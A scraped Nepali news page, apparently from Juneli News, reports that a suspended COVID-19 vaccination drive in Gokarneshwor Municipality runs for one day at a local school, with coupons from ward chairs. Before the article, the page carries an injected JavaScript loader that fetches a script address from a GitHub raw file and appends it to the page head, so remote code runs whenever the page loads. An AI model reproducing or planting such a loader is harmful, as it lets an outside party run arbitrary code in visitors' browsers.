;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); गोकर्णेश्वर नगरपालिकामा स्थगित भएको कोभिड विरुद्दको खोप आज एकदिन सन्चालन हुने – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • गोकर्णेश्वर नगरपालिकामा स्थगित भएको कोभिड विरुद्दको खोप आज एकदिन सन्चालन हुने
समाचार

गोकर्णेश्वर नगरपालिकामा स्थगित भएको कोभिड विरुद्दको खोप आज एकदिन सन्चालन हुने

जुनेली न्यूज, काठमाडौँ। गोकर्णेश्वर नगरपालिकामा स्थगित भएको खोप अभियान आज श्रावण १९ गते मंगलबार एक दिनको लागि कोभिड विरुद्दको खोप संचालन हुने भएको छ।

आज एक दिनको लागि सहयोगी मा वि खोप केन्द्र गोकर्णेश्वर ४  गोकर्णमा   बिहान ११ बजे  देखि  अपरान्ह ४ बजे सम्म  संचालन हुने जानकारी  गराइएको छ ।

सो खोप लिनको लागि आ आफ्नो वडाको वडा अध्यक्षहरु बाट कुपन लिएर मात्र खोप केन्द्रको लाइनमा बस्न समेत नगरपालिकाले जानकारी दिएको छ ।

फेसबुक प्रतिक्रियाहरु